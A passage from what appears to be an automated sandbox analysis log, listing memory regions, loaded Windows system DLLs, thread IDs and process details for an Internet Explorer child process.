"pagefile_0x0000000000140000" filename = "" Region: id = 336 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 337 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 338 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 339 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 340 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 341 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 342 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 343 start_va = 0x4b0000 end_va = 0x52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 344 start_va = 0x530000 end_va = 0x922fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 345 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 346 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 347 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 348 start_va = 0xb30000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 349 start_va = 0xb70000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 350 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 351 start_va = 0xc30000 end_va = 0xefefff entry_point = 0xc30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 352 start_va = 0xf00000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 353 start_va = 0xfd0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 354 start_va = 0x1010000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 355 start_va = 0x1070000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 356 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 357 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 358 start_va = 0x11b0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 359 start_va = 0x12b0000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 360 start_va = 0x13f0000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 361 start_va = 0x1400000 end_va = 0x14bffff entry_point = 0x1400000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 362 start_va = 0x14f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 363 start_va = 0x15e0000 end_va = 0x15effff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 364 start_va = 0x16c0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 365 start_va = 0x17a0000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 366 start_va = 0x6e5a0000 end_va = 0x6e5acfff entry_point = 0x6e5a0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 367 start_va = 0x6e5b0000 end_va = 0x6e5b2fff entry_point = 0x6e5b0000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 368 start_va = 0x6e5c0000 end_va = 0x6e5d1fff entry_point = 0x6e5c0000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 369 start_va = 0x6e5e0000 end_va = 0x6e66ffff entry_point = 0x6e5e0000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 370 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 371 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 372 start_va = 0x6f290000 end_va = 0x6f2f0fff entry_point = 0x6f290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 373 start_va = 0x6fcf0000 end_va = 0x6fd3efff entry_point = 0x6fcf0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 374 start_va = 0x6fd40000 end_va = 0x6fd97fff entry_point = 0x6fd40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 375 start_va = 0x6fff0000 end_va = 0x70004fff entry_point = 0x6fff0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 376 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 377 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 378 start_va = 0x71f60000 end_va = 0x71f67fff entry_point = 0x71f60000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 379 start_va = 0x71f70000 end_va = 0x71f81fff entry_point = 0x71f70000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 380 start_va = 0x733c0000 end_va = 0x733cffff entry_point = 0x733c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 381 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 382 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 383 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 384 start_va = 0x737a0000 end_va = 0x737a7fff entry_point = 0x737a0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 385 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 386 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 387 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 388 start_va = 0x73880000 end_va = 0x73888fff entry_point = 0x73880000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 389 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 390 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 391 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 392 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 393 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 394 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 395 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 396 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 397 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 398 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 399 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 400 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 401 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 402 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 403 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 404 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 405 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 406 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 407 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 408 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 409 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 410 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 411 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 412 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 413 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 414 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 415 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 416 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 417 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 418 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 419 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 420 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 421 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 422 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 423 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 424 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 425 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 426 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 427 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 428 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 429 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 430 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 431 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 432 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 433 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 434 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 435 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 436 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 437 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 438 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 439 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 440 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 12 os_tid = 0x96c Thread: id = 13 os_tid = 0x1f0 Thread: id = 14 os_tid = 0x124 Thread: id = 15 os_tid = 0x144 Thread: id = 16 os_tid = 0x7bc Thread: id = 17 os_tid = 0x7a8 Thread: id = 18 os_tid = 0x7a4 Thread: id = 19 os_tid = 0x638 Thread: id = 20 os_tid = 0x414 Thread: id = 21 os_tid = 0x408 Thread: id = 22 os_tid = 0x400 Thread: id = 23 os_tid = 0x3ec Thread: id = 83 os_tid = 0xc30 Thread: id = 85 os_tid = 0xd28 Process: id = "4" image_name = "iexplore.exe" filename = "c:\\program files\\internet explorer\\iexplore.exe" page_root = "0x7ea16660" os_pid = "0xbd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xb64" cmd_line = "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" SCODEF:2916 CREDAT:14337" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 580 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 581 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 582 start_va = 0x40000 end_va = 0xe5fff entry_point = 0x40000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe") Region: id = 583 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 584 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 585 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 586 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 587 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 588 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 589 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 590 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 591 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 592 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 593 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 594 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 595 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 596 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 597 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 598 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 599 start_va = 0x76650000 end_va = 0x76744fff entry_point = 0x76650000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 600 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 601 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 602 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 603 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 604 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 605 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 606 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 607 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 608 start_va = 0x76e70000 end_va = 0x76fa5fff entry_point = 0x76e70000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 609 start_va = 0x76fb0000 end_va = 0x771aafff entry_point = 0x76fb0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 610 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 611 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 612 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 613 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 614 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 615 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 616 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 617 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 618 start_va = 0x440000 end_va = 0x441fff entry_point = 0x440000 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 619 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 620 start_va = 0x460000 end_va = 0x460fff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 621 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 622 start_va = 